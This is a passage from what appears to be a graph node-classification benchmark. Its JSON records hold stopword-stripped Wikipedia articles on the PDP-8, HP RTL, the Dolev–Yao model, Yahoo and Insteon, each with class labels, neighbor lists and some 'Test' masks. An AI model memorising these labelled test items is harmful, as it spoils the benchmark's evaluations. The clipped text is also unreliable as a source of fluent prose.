pdp-8/s 519 logic gates comparison small microcontrollers 2008 usually 15,000 reductions electronics permitted much smaller case size bread-box even later pdp-8/e larger capable computer reengineered better value employs faster transistor–transistor logic integrated circuits core memory redesigned allows expansion less expense uses omnibus place wire-wrapped backplane earlier models personal account development pdp-8/e read engineering technology history wiki total sales figure pdp-8 family estimated 300,000 machines following models manufactured pdp-8 readily emulated instruction set much simpler modern architectures enthusiasts created entire pdp-8s using single fpga devices several software simulations pdp-8 available internet well open-source hardware re-implementations best correctly execute dec operating systems diagnostic software software simulations often simulate late-model pdp-8s possible peripherals even use tiny fraction capacity modern personal computer i/o systems underwent huge changes pdp-8 era early pdp-8 models use front panel interface paper-tape reader teletype printer optional paper-tape punch time i/o systems magnetic tape rs-232 current loop dumb terminals punched card readers fixed-head disks added toward end pdp-8 era floppy disks moving-head cartridge disk drives popular i/o devices modern enthusiasts created standard pc style ide hard disk adapters real simulated pdp-8 computers several types i/o supported simplified inexpensive form dma called three-cycle data break supported requires assistance processor data break method moves common logic needed implement dma i/o i/o device one common copy logic within processor data break places processor charge maintaining dma address word count registers three successive memory cycles processor updates word count updates transfer address stores retrieves actual i/o data word one-cycle data break effectively triples dma transfer rate target data needed transferred core memory however i/o devices need electronic logic manage word count transfer address registers time pdp-8/e introduced electronic logic become less expensive one-cycle data break became popular early pdp-8 systems operating system front panel run halt switches software development systems pdp-8 series began basic front-panel entry raw binary machine code booting entry middle era various paper tape operating systems developed many utility programs became available paper tape pal-8 assembly language source code often stored paper tape read memory saved paper tape pal assembled paper tape memory paper tape versions number programming languages available including dec focal interpreter 4k fortran compiler runtime toward end pdp-8 era operating systems os/8 cos-310 allowed traditional line mode editor command-line compiler development system using languages pal-iii assembly language fortran basic dibol fairly modern advanced real-time operating system rtos preemptive multitasking multi-user systems available real-time system rts-8 available multiuser commercial systems cos-300 cos-310 dedicated single-user word-processing system wps-8 time-sharing system tss-8 also available tss-8 allows multiple users log system via 110-baud terminals edit compile debug programs languages include special version basic fortran subset similar fortran-1 user-written subroutines functions algol subset focal assembler called pal-d. fair amount user-donated software pdp-8 available decus digital equipment corporation user society often came full source listings documentation three high-order bits 12-bit instruction word labelled bits 0 2 operation code six operations refer memory bits 5 11 provide 7-bit address bit 4 set says complete address using 5 high-order bits program counter pc register meaning addressed location within 128 words instruction bit 4 clear zeroes used addressed location within first 128 words memory bit 3 specifies indirection set address obtained described far points 12-bit value memory gives actual effective address instruction allows operands anywhere memory expense additional word jmp instruction operate memory word except indirection specified bit fields use instruction word divides 4,096-word memory 128-word pages bit 4 instruction selects either current page page 0 addresses 0000–0177 octal memory page 0 premium since variables placed addressed directly page moreover address 0000 interrupt service routine must start addresses 0010–0017 special property auto-incrementing preceding indirect reference standard assembler places constant values arithmetic current page likewise cross-page jumps subroutine calls use indirect address current page important write routines fit within 128-word pages arrange routines minimize page transitions references jumps outside current page require extra word consequently much time spent cleverly conserving one several words programmers deliberately placed code end page achieve free transition next page pc incremented pdp-8 processor defined iot instructions simply provided framework iot instructions defined individual i/o devices bits 3 8 iot instruction select i/o device device addresses standardized convention instructions device 0 affect processor whole example ion 6001 enables interrupt processing ioff 6002 disables bits 9 11 iot instruction select function device performs simple devices paper tape reader punch console keyboard printer use bits standard ways operations take place well-defined order gives useful results one bit set complicated devices disk drives use 3 bits device-specific fashions typically device decodes 3 bits give 8 possible function codes many operations achieved using opr including conditionals opr address memory location conditional execution achieved conditionally skipping one instruction typically jmp opr instruction said microcoded mean word means today lower-level program fetched interpreted opr instruction meant bit instruction word specifies certain action programmer could achieve several actions single instruction cycle setting multiple bits use programmer write several instruction mnemonics alongside one another assembler combines devise actual instruction word many i/o devices support microcoded iot instructions microcoded actions take place well-defined sequence designed maximize utility many combinations opr instructions come groups bits 3 8 11 identify group opr instruction impossible combine microcoded actions different groups cases operations sequenced combined useful ways example combining cla clear accumulator cll clear link iac increment accumulator first clears ac link increments accumulator leaving set 1 adding ral mix cla cll iac ral causes accumulator cleared incremented rotated left leaving set 2 way small integer constants placed accumulator single instruction combination cma iac assembler lets abbreviate cia produces arithmetic inverse ac twos-complement negation since subtraction instruction twos-complement add tad computing difference two operands requires first negating subtrahend group 1 opr instruction none microprogrammed bits set performs action programmer write nop operation assemble instruction bit 8 clear skip performed specified conditions true example sma sza opcode 7540 skips ac ≤ 0 group 2 opr instruction none microprogrammed bits set another no-op instruction bit 8 set group 2 skip condition inverted via de morgan laws skip performed group 2 conditions true meaning specified skip conditions must true example spa sna opcode 7550 skips ac 0 none bits 5–7 set skip unconditional unused bit combinations opr defined third group microprogrammed actions mostly affecting mq multiplier/quotient register typically cla mqa combined transfer mq ac another useful combination mqa mql exchange two registers three bits specified multiply/divide instruction perform 12-bit word 4,096 different values maximum number words original pdp-8 address indirectly word pointer programs became complex price memory fell became desirable expand limit maintain compatibility pre-existing programs new hardware outside original design added high-order bits effective addresses generated program memory extension controller expands addressable memory factor 8 total 32,768 words expansion thought sufficient core memory costing 50 cents word full 32k memory would equal cost cpu 4k memory called field memory extension controller contains two three-bit registers df data field instruction field registers specify field memory reference cpu allowing total 15 bits address register specifies field instruction fetches direct memory references df register specifies field indirect data accesses program running one field reference data field direct addressing reference data another field indirect addressing set i/o instructions range 6200 6277 handled memory extension controller give access df registers 62x1 instruction cdf change data field set data field x similarly 62x2 cif set instruction field 62x3 set pre-existing programs would never execute cif cdf df registers would point field single field programs limited effect cif instruction deferred coincide next jmp jms instruction executing cif would cause jump complicated multiple-field programs deal field boundaries df registers would could simply generate 15-bit addresses design provided backward compatibility consistent 12-bit architecture used throughout pdp-8 compare later intel 8086 whose 16-bit memory addresses expanded 20 bits combining contents specified implied segment register extended memory scheme let existing programs handle increased memory minimal changes example 4k focal normally 3k code 1k left user program data patches focal could use second 4k field user program data moreover additional 4k fields could allocated separate users turning 4k focal multi-user timesharing system pdp-8/e later models memory extension controller enhanced enable machine virtualization program written use pdp-8 entire resources coexist programs pdp-8 control virtual machine manager manager make i/o instructions including operated memory extension controller cause trap interrupt handled manager way manager map memory references map data instruction fields redirect i/o different devices original program complete access virtual machine provided manager new i/o instructions memory extension controller retrieve current value data instruction fields letting software save restore machine state across trap however program sense whether cpu process deferring effect cif instruction whether executed cif yet executed matching jump instruction manager include complete pdp-8 emulator difficult 8-instruction machine whenever cif instruction traps manager emulate instructions next jump fortunately jump usually next instruction cif emulation slow programs much large workaround seemingly small design deficiency time pdp-8/a memory prices fallen enough memory exceeding 32k desirable 8/a added new set instructions handling eight fields memory field number could placed ac rather hard-coded instruction however time pdp-8 decline little standard software modified use new features following examples show code pdp-8 assembly language one might write pal-iii assembler following piece code shows needed compare two numbers shown much text typical pdp-8 program focuses author intended algorithm low-level mechanics additional readability problem conditional jumps one shown conditional instruction skips around jmp highlights opposite condition interest complete pdp-8 assembly language program outputs hello world teleprinter pdp-8 processor implement stack upon store registers context subroutine called interrupt occurs stack implemented software demonstrated next section instead jms instruction simply stores updated pc pointing past jms return address effective address jumps effective address plus one subroutine returned caller using indirect jmp instruction addresses subroutine first word example hello world re-written use subroutine jms instruction jumps subroutine modifies 0 coded location out1 fact jms instruction uses word code subroutine deposit return address prevents reentrancy recursion without additional work programmer also makes difficult use rom pdp-8 read-write return-address storage commingled read-only code storage address space programs intended placed roms approach problem several ways use jms instruction makes debugging difficult programmer makes mistake subroutine call directly intermediate subroutine return address outer call destroyed return address subsequent call leading infinite loop one module coded incorrect obsolete address subroutine would fail execute entire code sequence subroutine might modify word subroutine code depositing return address processor might interpret instruction subsequent correct call subroutine types error might become evident execution code written correctly though pdp-8 hardware stack stacks implemented software example push pop subroutines simplified omit issues testing stack overflow underflow hello world stack implemented subroutine another possible subroutine pdp-8 linked list single interrupt line pdp-8 i/o bus processor handles interrupt disabling interrupts executing codice_1 location 0000 difficult write reentrant subroutines difficult nest interrupts usually done interrupt runs completion re-enables interrupts executing codice_2 instruction returns interrupt single interrupt line i/o bus occurrence interrupt inform processor source interrupt instead interrupt service routine serially poll active i/o device see source code called skip chain consists series pdp-8 test skip flag set i/o instructions unheard-of skip chain reach end without finding device need service relative interrupt priority i/o devices determined position skip chain several devices interrupt device tested earlier skip chain serviced first engineering textbook popular 1980s art digital design david winkel franklin prosser contains example problem spanning several chapters authors demonstrate process designing computer compatible pdp-8/i function every component explained although production design uses modern ssi msi components exercise provides detailed description computer operation",
    "neighbors": [
      512,
      6529,
      1029,
      1798,
      6155,
      4492,
      9739,
      9742,
      10508,
      7188,
      9366,
      9723,
      8474,
      7323,
      7580,
      1952,
      10786,
      7076,
      6821,
      2345,
      11051,
      8876,
      3886,
      9391,
      6448,
      7858,
      1716,
      6837,
      8503,
      9911,
      4409,
      10111,
      4667,
      3650,
      7234,
      11075,
      3142,
      8390,
      2507,
      2638,
      8910,
      5328,
      5457,
      5840,
      9295,
      11604,
      3159,
      9563,
      477,
      3945,
      4331,
      10220,
      1776,
      3056,
      4465,
      499,
      5873,
      6129,
      7281,
      2811,
      7421,
      9599
    ],
    "mask": "None"
  },
  {
    "node_id": 8733,
    "label": 9,
    "text": "Hewlett-Packard_Raster_Transfer_Language:hewlett-packard raster transfer language hewlett-packard raster transfer language hp rtl subset printer command language pcl language used embed true raster images bitmaps plotter files modern plotters like hp designjets raster devices need raster-based language backward compatibility also support hp-gl/2 formerly hp-gl vector language hp rtl language designed mixing hp-gl/2 language",
    "neighbors": [
      5384,
      9795,
      6830
    ],
    "mask": "Test"
  },
  {
    "node_id": 8734,
    "label": 4,
    "text": "Dolev–Yao_model:dolev–yao model dolev–yao model formal model used prove properties interactive cryptographic protocols network represented set abstract machines exchange messages messages consist formal terms terms reveal internal structure messages parts hopefully remain opaque adversary adversary model overhear intercept synthesize message limited constraints cryptographic methods used words attacker carries message omnipotence difficult model many threat models simplify example attacker ubiquitous computing cryptographic primitives modeled abstract operators example asymmetric encryption user formula_1 represented encryption function formula_2 decryption function formula_3 main properties composition identity function formula_4 encrypted message formula_5 reveals nothing formula_6 unlike real world adversary neither manipulate encryption bit representation guess key attacker may however re-use messages sent therefore become known attacker encrypt decrypt keys knows forge subsequent messages protocol modeled set sequential runs alternating queries sending message network responses obtaining message network symbolic nature dolev–yao model makes manageable computational models accessible algebraic methods potentially less realistic however kinds models cryptographic protocols related also symbolic models well suited show protocol broken rather secure given assumptions attackers capabilities",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8735,
    "label": 8,
    "text": "Yahoo!:yahoo yahoo american web services provider headquartered sunnyvale california owned verizon media original yahoo company founded jerry yang david filo january 1994 incorporated march 2 1995 yahoo one pioneers early internet era 1990s provides provided web portal search engine yahoo search related services including yahoo directory yahoo mail yahoo news yahoo finance yahoo groups yahoo answers advertising online mapping video sharing fantasy sports social media website height one popular sites united states according third-party web analytics providers alexa similarweb yahoo widely read news media website – 7 billion views per month – ranking sixth-most-visited website globally 2016 one largest internet companies yahoo slowly declined starting late 2000s 2017 verizon communications acquired yahoo internet business 4.48 billion ref name= yahoo -inc-jun-2017-sc-to-i/a /ref excluding stakes alibaba group yahoo japan transferred yahoo successor company altaba despite decline prominence yahoo domain websites still one popular ranking 8th world according alexa rankings january 2019 january 1994 yang filo electrical engineering graduate students stanford university created website named jerry david guide world wide web site directory websites organized hierarchy opposed searchable index pages march 1994 jerry david guide world wide web renamed yahoo human-edited yahoo directory provided users surf internet became first product company original purpose yahoo.com domain created january 18 1995 word yahoo backronym yet another hierarchically organized oracle yet another hierarchical officious oracle term hierarchical described yahoo database arranged layers subcategories term oracle intended mean source truth wisdom term officious rather related word normal meaning described many office workers would use yahoo database surfing work however filo yang insist mainly selected name liked slang definition yahoo used college students david filo native louisiana late 1980s early 1990s refer unsophisticated rural southerner rude unsophisticated uncouth meaning derives yahoo race fictional beings gulliver travels yahoo grew rapidly throughout 1990s yahoo went public april 1996 stock price rose 600 percent within two years like many search engines web directories yahoo added web portal putting competition services like excite lycos america online 1998 yahoo popular starting point web users human-edited yahoo directory popular search engine receiving 95 million page views per day triple number compared rival excite also made many high-profile acquisitions yahoo began offering free e-mail october 1997 acquisition rocketmail renamed yahoo mail 1998 yahoo decided replace altavista crawler-based search engine underlying directory inktomi yahoo two biggest acquisitions made 1999 – geocities 3.6 billion broadcast.com 5.7 billion stock price skyrocketed dot-com bubble yahoo stocks closing all-time high 118.75 share january 3 2000 however dot-com bubble burst reached post-bubble low 8.11 september 26 2001 yahoo began using google search 2000 next four years developed search technologies began using 2004 partly using technology 280 million acquisition inktomi 2002 response google gmail yahoo began offer unlimited email storage 2007 company struggled 2008 several large layoffs february 2008 microsoft corporation made unsolicited bid acquire yahoo 44.6 billion yahoo formally rejected bid claiming substantially undervalues company interest shareholders three years later yahoo market capitalization 22.24 billion carol bartz replaced yang ceo january 2009 september 2011 removed position yahoo company chairman roy bostock cfo tim morse named interim ceo company early 2012 appointment scott thompson ceo rumors began spread looming layoffs several key executives left including chief product officer blake irving. ref name= yahoo -inc-apr-2012-10-k/a /ref april 4 2012 yahoo announced cut 2,000 jobs 14 percent 14,100 workers cut expected save around 375 million annually layoffs completed end 2012 email sent employees april 2012 thompson reiterated view customers come first yahoo also completely reorganized company may 13 2012 yahoo issued press release stating thompson longer company would immediately replaced interim basis ross levinsohn recently appointed head yahoo new media group thompson total compensation 130-day tenure yahoo least 7.3 million july 15 2012 marissa mayer appointed president ceo yahoo effective july 17 2012 may 19 2013 yahoo board approved 1.1 billion purchase blogging site tumblr tumblr ceo founder david karp would remain large shareholder announcement reportedly signified changing trend technology industry large corporations like yahoo facebook google acquired start-up internet companies generated low amounts revenue way connect sizeable fast-growing online communities wall street journal stated purchase tumblr would satisfy yahoo need thriving social-networking communications hub may 20 company announced acquisition tumblr officially transaction completed one month company also announced plans open san francisco office july 2013 august 2 2013 yahoo acquired rockmelt staff retained existing products terminated data collated comscore july 2013 revealed people u.s. visited yahoo websites month google occasion first time yahoo outperformed google since 2011 data count mobile usage tumblr december 12 2014 yahoo completed acquisition video advertising provider brightroll 583 million november 21 2014 announced yahoo acquired cooliris fourth quarter 2013 company share price doubled since marissa mayer took president july 2012 however share price peaked 35 november 2013 go 36.04 mid-afternoon december 2 2015 perhaps news board directors meeting decide future mayer whether sell struggling internet business whether continue spinoff stake china alibaba e-commerce site gone well mayer tenure including 1.1 billion acquisition tumblr yet prove beneficial forays original video content led 42 million write-down sydney finkelstein professor dartmouth college tuck school business told washington post sometimes single best thing ... sell company closing price yahoo inc. december 7 2015 34.68 wall street journal douglas macmillan reported february 2 2016 yahoo ceo marissa mayer expected cut 15 workforce july 25 2016 verizon communications announced agreed purchase yahoo core internet business 4.83 billion following conclusion purchase assets merged aol form new entity known oath inc. june 13 2017 yahoo aol huffington post continue operate names oath inc. umbrella deal excludes yahoo 15 stake alibaba group 35.5 stake yahoo japan following completion acquisition assets retained name altaba new executive team september 22 2016 yahoo disclosed data breach occurred late 2014 information associated least 500 million user accounts one largest breaches reported date united states indicted four men including two employees russia federal security service fsb involvement hack december 14 2016 company revealed another separate data breach occurred 2014 hackers obtaining sensitive account information including security questions least one billion accounts company stated hackers utilized stolen internal software forge http cookies response breaches bloomberg news reported verizon attempting re-negotiate deal reduce purchase price 250 million causing 2 increase yahoo stock prices february 21 2017 verizon agreed lower purchase price yahoo 350 million share liabilities regarding investigation data breaches june 8 2017 yahoo shareholders approved company sale internet assets verizon 4.48 billion deal officially closed june 13 2017 press release october 3 2017 oath inc. subsidiary verizon stated yahoo user accounts 3 billion affected august 2013 theft june 16 2017 parts original yahoo inc purchased verizon communications renamed altaba inc. united states securities exchange commission website listed new company non-diversified closed-end management investment company former yahoo inc. ticker symbol yhoo retired favor aaba took place monday june 19 2017 yahoo operated portal provides latest news entertainment sports information portal also gave users access yahoo services like yahoo search yahoo mail yahoo maps yahoo finance yahoo groups yahoo messenger yahoo provided internet communication services yahoo messenger yahoo mail may 2007 e-mail service would offer unlimited storage yahoo provided social networking services user-generated content including products web yahoo personals yahoo 360° delicious flickr yahoo buzz yahoo closed yahoo buzz mybloglog numerous products april 21 2011 yahoo photos closed september 20 2007 favor flickr october 16 2007 yahoo announced would discontinue yahoo 360° including bug repairs company explained 2008 would instead establish universal profile similar yahoo mash experimental system yahoo partners numerous content providers products yahoo sports yahoo finance yahoo music yahoo movies yahoo weather yahoo news yahoo answers yahoo games provide news related content yahoo provides personalization service yahoo enables users combine favorite yahoo features content feeds information onto single page march 31 2008 yahoo launched shine site tailored women seeking online information advice ages 25 54 yahoo developed partnerships broadband providers inc. via prodigy bellsouth sbc verizon communications rogers communications british telecom offering range free premium yahoo content services subscribers yahoo mobile offers services email instant messaging mobile blogging well information services searches alerts services camera phone include entertainment ring tones yahoo introduced internet search system called onesearch mobile phones march 20 2007 results include news headlines images flickr business listings local weather links sites instead showing example popular movies critical reviews onesearch lists local theaters moment playing movie along user ratings news headlines regarding movie zip code city name required onesearch start delivering local search results results web search listed single page prioritized categories 2012 yahoo used novarra mobile content transcoding service onesearch october 8 2010 yahoo announced plans bring video chat mobile phones via yahoo messenger yahoo offers shopping services yahoo shopping yahoo autos yahoo real estate yahoo travel enables users gather relevant information make commercial transactions purchases online yahoo auctions discontinued 2007 except asia yahoo shopping price comparison service uses kelkoo price comparison service acquired april 2004 yahoo search marketing provides services sponsored search local advertising product/travel/directory submit let different businesses advertise products services yahoo network following closure beta version april 30 2010 yahoo publisher network relaunched advertising tool allows online publishers monetize websites use site-relevant advertisements yahoo launched new internet advertisement sales system fourth quarter 2006 called panama allows advertisers bid search terms trigger ads search results pages system considers bids ad quality clickthrough rates factors ranking ads panama yahoo aims provide relevant search results users better overall experience increase monetization april 7 2008 yahoo announced apt yahoo originally called amp yahoo online advertising management platform platform simplifies advertising sales unifying buyer seller markets service launched september 2008 july 2009 yahoo agrees use microsoft exclusive technology provider search services microsoft provide contextual advertising yahoo non-exclusive basis yahoo exclusive worldwide relationship sales force yahoo microsoft premium search advertisers september 2011 yahoo formed ad selling strategic partnership 2 top competitors aol microsoft 2013 found underperforming market share revenue microsoft simply skimmed four percent search market yahoo without growing combined share yahoo next incubation ground future yahoo technologies currently undergoing testing contained forums yahoo users give feedback assist development future yahoo technologies yahoo search boss service allows developers build search applications based yahoo search technology early partners program include hakia me.dium delver daylife yebol early 2011 program switched paid model using cost-per-query model 0.40 0.75 cpm cost per 1000 boss queries price yahoo explained depends whether query web image news information became defunct 2016 replaced yahoo partner ads yahoo meme beta social service similar popular social networking sites twitter jaiku connect enables individuals leave comments online publication boards using yahoo id instead register individual publications wall street journal reported yahoo plans mimic strategy used rival facebook inc. help drive traffic site yahoo invested resources increase improve access internet disabled community yahoo accessibility lab yahoo axis desktop web browser extension mobile browser ios devices created developed yahoo extension made public debut may 23 2012 retired june 28 2013 copy private key used sign official yahoo browser extensions google chrome accidentally leaked first public release chrome extension yahoo searchmonkey often misspelled search monkey yahoo service allowed developers site owners use structured data make yahoo search results useful visually appealing drive relevant traffic sites service shut october 2010 along yahoo services part microsoft yahoo search deal name searchmonkey homage greasemonkey officially product name space two capital letters yahoo searchmonkey selected one top 10 semantic web products 2008 geocities popular web hosting service founded 1995 one first services offer web pages public one point third-most-browsed site world wide web yahoo purchased geocities 1999 ten years later web host closed deleting seven million web pages great deal information lost many sites pages mirrored internet archive oocities.com databases yahoo go java-based phone application access yahoo services closed january 12 2010 yahoo 360° blogging/social networking beta service launched march 2005 yahoo closed july 13 2009 yahoo mash beta another social service closed one year operation prior leaving beta status yahoo photos shut september 20 2007 favor integration flickr yahoo tech website provided product information setup advice users yahoo launched website may 2006 march 11 2010 yahoo closed service redirected users yahoo technology news section discontinued services include farechase web audio search pets live kickstart briefcase yahoo teachers hotjobs acquired merged monster.com yahoo koprol indonesian geo-tagging website allowed users share information locations without use gps device koprol acquired yahoo year following inception 2011 1.5 million people utilizing website users also based singapore philippines vietnam however eighty percent users indonesian yahoo officially discontinued koprol august 28 2012 meaningfully drive revenue engagement yahoo mail classic announced shut april 2013 yahoo made notice starting june 2013 mail classic old versions yahoo mail shut users mail classic expected switch new yahoo mail use imap switch another email service addition april 2013 brought closure upcoming yahoo deals yahoo sms alerts yahoo kids yahoo mail messenger feature phone j2me early july 2013 yahoo announced scheduled closure task management service astrid yahoo acquired company may 2013 discontinue service august 5 2013 team astrid supplied customers data export tool recommended former competitors wunderlist sandglaz december 15 2010 one day yahoo announced layoffs 4 workers across portfolio mybloglog founder eric marcoullier posted slide yahoo employee twitter slide visible employee-only strategy webcast indicating changes yahoo offerings following services column sunset yahoo picks altavista mym alltheweb yahoo bookmarks yahoo buzz del.icio.us mybloglog merge column upcoming foxytunes yahoo events yahoo people search sideline fireeagle 11 properties listed yahoo interested developing feature sites within portal take place sunset merge vacancies including prior feature services new yahoo mail launched yahoo address book calendar notepad despite notepad listed feature service instead sunset merge 2010 yahoo since taken steps de-emphasize notepad example january 2013 notepad longer linked within new yahoo mail service although continued linked older classic version also starting mid- late january 2013 notepad longer searchable blog del.icio.us website released post chris yeh slide leaked yeh stated sunset n't necessarily mean yahoo closing site yeh explained possibilities—including del.icio.us leaving yahoo sale spinoff —were still considered imagine upsetting news coverage past 24 hours many speaking team disappointed way appeared press april 27 2011 yahoo sale del.icio.us avos announced yahoo buzz closed april 21 2011 without official announcement yahoo mybloglog discontinued yahoo may 24 2011 september 2013 yahoo transparency report said company received 29 thousand requests information users governments first six months 2013 12 thousand requests came united states october 2013 washington post reported u.s. national security agency intercepted communications yahoo data centers part program named muscular late january 2014 yahoo announced company blog detected coordinated effort hack possibly millions yahoo mail accounts company prompted users reset passwords elaborate scope possible breach citing ongoing federal investigation august 2015 researchers malwarebytes notified yahoo users getting hacked vulnerabilities flash according vulnerability could allow attackers install ransomware users computers lock files till customers pay criminals working comscore new york times found yahoo able collect far data users competitors web sites advertising network one measure average yahoo potential december 2007 build profile 2,500 records per month visitors yahoo retains search requests period 13 months however response european regulators yahoo obfuscates ip address users three months deleting last eight bits march 29 2012 yahoo announced would introduce track feature summer allowing users opt web-visit tracking customized advertisements however april 30 2014 yahoo announced would longer support track browser setting according 2008 article computerworld yahoo 2-petabyte specially built data warehouse uses analyze behavior half-billion web visitors per month processing 24 billion daily events contrast united states internal revenue service irs database united states taxpayers 150 terabytes september 2016 reported data least 500 million yahoo accounts stolen 2014 october 2016 reuters reported 2015 yahoo created software search customers e-mail request nsa fbi 2000 yahoo taken court france parties seeking prevent french citizens purchasing memorabilia relating nazi party march 2004 yahoo launched paid inclusion program whereby commercial websites guaranteed listings yahoo search engine yahoo discontinued program end 2009 yahoo criticized providing ads via yahoo ad network companies display spyware adware yahoo well search engines cooperated chinese government censoring search results april 2005 dissident shi tao sentenced 10 years prison providing state secrets foreign entities result identified ip address yahoo human rights organizations company general counsel disputed extent yahoo foreknowledge shi fate human rights groups also accuse yahoo aiding authorities arrest dissidents li zhi jiang lijun april 2017 yahoo sued failing uphold settlement agreements case yahoo pledged give support families arrested create relief fund persecuted expressing views online yahoo human rights trust 17.3 million allotted fund 13 million used townhouse washington dc purchases september 2003 dissident wang xiaoning convicted charges incitement subvert state power sentenced ten years prison yahoo hong kong connected wang group specific yahoo e-mail address xiaoning wife world organization human rights sued yahoo human rights laws behalf wang shi result media scrutiny relating internet child predators lack significant ad revenues yahoo user created chatrooms closed june 2005 may 25 2006 yahoo image search criticized bringing sexually explicit images even safesearch active august 2015 yahoo purchased 40 23 september 2013 owner alibaba group subject controversy allowing sale shark-derived products company banned sale shark fin products e-commerce platforms effective january 1 2009 november 30 2009 yahoo criticized electronic frontier foundation sending dmca notice whistle-blower website cryptome publicly posting details prices procedures obtaining private information pertaining yahoo subscribers concerns censorship private emails regarding website affiliated occupy wall street protests raised yahoo responded apology explained accident following media reports prism nsa massive electronic surveillance program june 2013 several technology companies identified participants including yahoo yahoo listed paradise papers set confidential electronic documents relating offshore investment leaked german newspaper süddeutsche zeitung scott ard prominent editorial director fired yahoo 2015 filed lawsuit accusing mayer leading sexist campaign purge male employees ard male employee stated mayer encouraged fostered use employee performance-rating system accommodate management subjective biases personal opinions detriment yahoo male employees suit ard claimed prior firing received fully satisfactory performance reviews since starting company 2011 head editorial programming yahoo home page however relieved role given woman recently hired megan lieberman editor-in-chief yahoo news lawsuit states liberman stated terminating ard received requested breakdown duties ard already provided information requested however reminded liberman done liberman excuse terminating ard pretext second sexual discrimination lawsuit filed separately gregory anderson fired 2014 alleging company performance management system arbitrary unfair making second sexism lawsuit yahoo mayer faced 2016 former chief operating officer henrique de castro departed company january 2014 mayer initially hired appointment ceo dismissed de castro previously worked google mckinsey company employed revive yahoo advertising business yahoo offers multi-lingual interface site available 20 languages official directory yahoo international sites world.yahoo.com company international sites wholly owned yahoo exception japan china sites yahoo holds 34.75 minority stake yahoo japan softbank holds 35.45 yahoo xtra new zealand yahoo 7 51 49 belongs telecom new zealand yahoo 7 australia 50–50 agreement yahoo seven network historically yahoo entered joint venture agreements softbank major european sites uk france germany well south korea japan november 2005 yahoo purchased minority interests softbank owned europe korea yahoo used hold 40 stake 35 voting power alibaba manages web portal china using yahoo brand name yahoo china yahoo usa direct control alibaba operates completely independent company september 18 2012 following years negotiations yahoo agreed sell 20 stake back alibaba 7.6 billion march 8 2011 yahoo launched romania local service years delay due financial crisis yahoo officially entered mena region acquired maktoob pan-regional arabic-language hosting social services online portal august 25 2009 since service pan-regional yahoo officially became yahoo maktoob region december 31 2012 yahoo korea shut services left country previous domain saying korean starting december 31 2012 yahoo korea ended go original yahoo yahoo information sooner message also disappear leaving abandoned empty search bar powered bing september 2 2013 yahoo china shut redirected taobao.com redirected yahoo singapore search page yahoo got first logo establishment 1994—it consists yahoo wordmark coloured black using times new roman font later changed march 1995 company changed name yahoo introduced another logo briefly changed elaborate text includes exclamation point end short-lived 5 months later august 1995 year yahoo changed logo became stylized yellow jumping figurine blue circle yahoo wordmark written logo also short-lived 4 months december 1995 january 1 1996 yahoo introduced much tweaking refining new logo quickly simplified text exclamation mark slight shadow behind text although gets coloured red also containing three icons side well becomes simple wordmark without graphics therefore create familiar logo existence since eventually logo used yahoo home page formerly consists red color black outline shadow june 2002 later becoming slightly changed new black shadows text replaces older gray color except gets introduced yahoo japan within following year gets still used today slight moderation 2013 see may 2009 yahoo overhauled theme redesign makes logo become recoloured purple without outline shadow purple logo first appeared headquarters yahoo messenger 1995 although get full effect november 12 2009 site received revamp entirely remove old red color 1996 change would apply several international yahoo home pages countries notably yahoo 7 australia still using red logo 2014 time purple logo comes new slogan ou used time occasion would time abbreviated august 7 2013 around midnight edt yahoo announced final version new logo would revealed september 5 2013 4:00 a.m. utc period leading unveiling new logo 30 days change campaign introduced whereby variation logo published every day 30 days following announcement new logo eventually launched accompanying video showed digital construction mayer published personalized description design process tumblr page mayer explains one weekend summer rolled sleeves dove trenches logo design team ... spent majority saturday sunday designing logo start finish ton fun weighing every minute detail knew wanted logo reflected yahoo – whimsical yet sophisticated modern fresh nod history human touch personal proud september 19 2013 yahoo launched new version yahoo personalized homepage redesign allows users tailor homepage widgets access features email accounts calendars flickr yahoo content internet content users also select theme packs represent artists polly apfelbaum alec monopoly bands empire sun mayer explained conference late september 2013 logo change result feedback external parties employees",
    "neighbors": [
      9732,
      1545,
      2062,
      4624,
      10263,
      8735,
      6703,
      8758,
      7739,
      8258,
      7750,
      1623,
      6237,
      3683,
      3174,
      8300,
      5229,
      113,
      4213,
      3703,
      119,
      6265,
      9344,
      1169,
      10392,
      2717,
      7329,
      7345,
      6834,
      4793,
      7869,
      2238,
      5311,
      7871,
      711,
      6344,
      7887,
      10450,
      5332,
      3286,
      735,
      1761,
      8932,
      4331,
      236,
      2285,
      756,
      4340,
      5876,
      3323,
      11009,
      3336,
      11017,
      6931,
      8983,
      1819,
      7965,
      5436,
      2372,
      10053,
      4945,
      8022,
      1372,
      8554,
      5483,
      11116,
      877,
      7539,
      4472,
      7547,
      10110,
      10111,
      9601,
      899,
      3460,
      3462,
      6023,
      11143,
      1930,
      11659,
      6028,
      7567,
      1943,
      3991,
      7575,
      9117,
      9630,
      6562,
      2469,
      1452,
      4027,
      444,
      8639,
      6081,
      11213,
      11221,
      2007,
      11225,
      987,
      2018,
      5607,
      488,
      6632,
      8170,
      7659,
      5631
    ],
    "mask": "Test"
  },
  {
    "node_id": 8736,
    "label": 7,
    "text": "Insteon:insteon insteon home automation domotics technology enables light switches lights thermostats leak sensors remote controls motion sensors electrically powered devices interoperate power lines radio frequency rf communications employs dual-mesh networking topology devices peers device independently transmits receives repeats messages like home automation systems associated internet things insteon-based products launched 2005 smartlabs company holds trademark insteon smartlabs subsidiary also named insteon created market technology according press release june 13 2017 smartlabs insteon technology acquired richmond capital partners rob lilleness universal electronics assuming role chairman ceo every message received insteon compatible device undergoes error detection correction retransmitted improve reliability devices retransmit message simultaneously message transmissions synchronous powerline frequency thus preserving integrity message strengthening signal powerline erasing rf dead zones insteon powerline messaging uses phase-shift keying insteon rf messaging uses frequency-shift keying message contains two-bit hops field initialized 3 originating node decremented time node network repeats message individual insteon messages also carry 14 bytes arbitrary user data custom applications insteon integrated dual-mesh formerly referred dual-band network combines wireless radio frequency rf building existing electrical wiring electrical wiring becomes backup transmission medium event rf/wireless interference conversely rf/wireless becomes backup transmission medium event powerline interference peer-to-peer network devices require network supervision thus allowing optional operation without central controllers routing tables insteon devices function without central controller additionally may managed central controller implement functions control via smartphones tablets control scheduling event handling problem reporting via email text messaging computer used central controller connecting insteon usb/serial powerlinc modem serves communication bridge computer insteon device network insteon network security maintained via linking control ensure users create links would allow control neighbors ’ insteon devices via encryption within extended insteon messages applications door locks security applications applications choose implement encryption insteon enforces linking control requiring users physical possession devices knowledge unique insteon ids order create links firmware insteon devices prohibits identifying devices unless user either physically presses button device installation process explicitly addresses device via central controller linking device sending insteon messages e.g. central controller requires knowledge address target insteon device addresses 